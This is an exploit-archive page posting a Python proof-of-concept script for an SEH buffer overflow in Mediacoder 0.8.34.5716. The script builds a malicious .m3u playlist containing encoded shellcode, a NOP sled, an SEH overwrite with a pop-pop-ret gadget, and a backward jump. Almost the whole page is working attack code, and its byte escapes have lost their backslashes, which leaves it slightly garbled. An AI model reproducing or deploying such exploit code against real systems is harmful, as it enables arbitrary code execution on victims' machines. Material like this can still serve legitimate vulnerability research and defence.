Home / exploits Mediacoder 0.8.34.5716 Buffer Overflow
Posted on 06 May 2015
#!/usr/bin/python # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u) # Date: 05/May/2015 # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan # email: kwiha2003 [at ]yahoo [dot] com # Version: 0.8.34.5716 # Tested on: Win XP3 # Vendor: http://www.mediacoderhq.com/ # Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe # Greetz: b33f,corelan,offsec,vulnhub,HUST510 # Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also # avoid a few bad bytes after the "A"s. #!/usr/bin/python buffersize = 853 buffer = ("http://" + "x41" * 256) #Space for shellcode to decode buffer += "x90" * 24 # msfpayload windows/exec CMD=calc R|msfencode -b "x00x0ax0dx20" -t c -e x86/shikata_ga_nai #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1) #unsigned char buf[] = buffer +=("xddxc1xbdxc4x15xfdx3axd9x74x24xf4x5fx29xc9xb1" "x32x31x6fx17x03x6fx17x83x2bxe9x1fxcfx4fxfax69" "x30xafxfbx09xb8x4axcax1bxdex1fx7fxacx94x4dx8c" "x47xf8x65x07x25xd5x8axa0x80x03xa5x31x25x8cx69" "xf1x27x70x73x26x88x49xbcx3bxc9x8exa0xb4x9bx47" "xafx67x0cxe3xedxbbx2dx23x7ax83x55x46xbcx70xec" "x49xecx29x7bx01x14x41x23xb2x25x86x37x8ex6cxa3" "x8cx64x6fx65xddx85x5ex49xb2xbbx6fx44xcaxfcx57" "xb7xb9xf6xa4x4axbaxccxd7x90x4fxd1x7fx52xf7x31" "x7exb7x6exb1x8cx7cxe4x9dx90x83x29x96xacx08xcc" "x79x25x4axebx5dx6ex08x92xc4xcaxffxabx17xb2xa0" "x09x53x50xb4x28x3ex3ex4bxb8x44x07x4bxc2x46x27" "x24xf3xcdxa8x33x0cx04x8dxccx46x05xa7x44x0fxdf" "xfax08xb0x35x38x35x33xbcxc0xc2x2bxb5xc5x8fxeb" "x25xb7x80x99x49x64xa0x8bx29xebx32x57xae") buffer += "x42" * 350 nseh = "xEBx06x90x90" # 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll] seh="xeex04x01x66" #Jump back 603 bytes due to insufficient space for shellcode jmpbck = "xe9xA5xfdxffxff" junk = ("D" * 55) f= open("exploit.m3u",'w') f.write(buffer + nseh + seh + jmpbck + junk) f.close()
